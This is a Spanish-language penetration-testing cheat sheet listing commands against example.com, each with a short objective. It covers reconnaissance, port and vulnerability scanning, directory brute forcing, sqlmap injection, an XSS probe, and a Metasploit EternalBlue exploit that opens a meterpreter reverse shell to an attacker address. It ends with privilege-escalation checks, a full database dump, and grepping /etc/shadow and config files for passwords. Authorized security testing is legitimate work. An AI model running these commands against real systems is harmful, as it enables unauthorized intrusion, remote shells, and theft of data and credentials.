Plan exhaustivo de pentesting orientado a ser ejecutado en una máquina Linux en modo texto. Incluye una combinación de técnicas automatizadas y manuales para garantizar una evaluación de seguridad integral.
whois example.com
Objetivo: Obtener información de registro del dominio.
dig example.com dig example.com MX dig example.com NS dig example.com ANY
Objetivo: Obtener registros DNS asociados con el dominio.
sublist3r -d example.com
Objetivo: Identificar subdominios relacionados con el dominio objetivo.
exiftool document.pdf
Objetivo: Extraer metadatos de archivos para obtener información sensible.
nmap -sS -sV -p- example.com
Objetivo: Identificar puertos abiertos y servicios que se están ejecutando.
nmap -sV -p [puertos] example.com
Objetivo: Determinar versiones de servicios para detectar posibles vulnerabilidades.
nmap --script vuln -p [puertos] example.com
Objetivo: Usar scripts NSE para identificar vulnerabilidades específicas.
openvas-start openvas-check-setup openvas-scan-target example.com
Objetivo: Utilizar OpenVAS para escanear vulnerabilidades conocidas.
nikto -h example.com
Objetivo: Identificar configuraciones inseguras y vulnerabilidades en servidores web.
wpscan --url example.com
Objetivo: Identificar vulnerabilidades en sitios web que utilizan WordPress.
gobuster dir -u example.com -w /usr/share/wordlists/dirb/common.txt
Objetivo: Fuerza bruta de directorios y archivos comunes en el servidor web.
msfconsole search [vulnerability] use exploit/[exploit_path] set RHOST example.com set RPORT [puerto] run
Objetivo: Utilizar Metasploit para explotar vulnerabilidades conocidas.
sqlmap -u "http://example.com/vulnerable_page.php?id=1" --dbs
Objetivo: Identificar y explotar inyecciones SQL.
curl "http://example.com/search.php?query=<script>alert('XSS')</script>"
Objetivo: Probar inyección de scripts maliciosos en campos de entrada.
nmap --script smb-vuln* -p 445 example.com msfconsole use exploit/windows/smb/ms17_010_eternalblue set RHOST example.com set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST [tu_IP] run
Objetivo: Explotar vulnerabilidades SMB conocidas (MS17-010).
find / -perm -u=s -type f 2>/dev/null
Objetivo: Encontrar binarios SUID para posible elevación de privilegios.
ps aux crontab -l
Objetivo: Identificar posibles vectores para elevación de privilegios.
mysqldump -u root -p --all-databases > all_databases.sql
Objetivo: Extraer bases de datos completas.
grep -i "password" /etc/passwd /etc/shadow /var/www/html/config.php
Objetivo: Buscar contraseñas almacenadas en texto claro en archivos de configuración.